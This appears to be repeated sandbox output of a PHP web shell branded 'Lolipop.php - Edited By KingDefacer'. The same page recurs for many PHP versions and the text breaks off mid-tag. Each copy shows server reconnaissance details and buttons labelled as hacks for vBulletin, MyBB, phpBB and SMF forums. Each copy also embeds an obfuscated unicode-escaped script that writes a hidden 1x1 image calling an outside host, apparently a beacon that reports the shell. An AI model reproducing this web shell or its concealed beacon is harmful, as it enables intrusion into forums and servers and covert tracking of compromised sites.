type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.44
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.44</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.43
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.43</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.42
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.42</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.41
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.41</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.40
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.40</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.39
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.39</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.38
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.38</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.37
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.37</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.36
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.36</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.35
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.35</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.34
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.34</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.33
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.33</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' 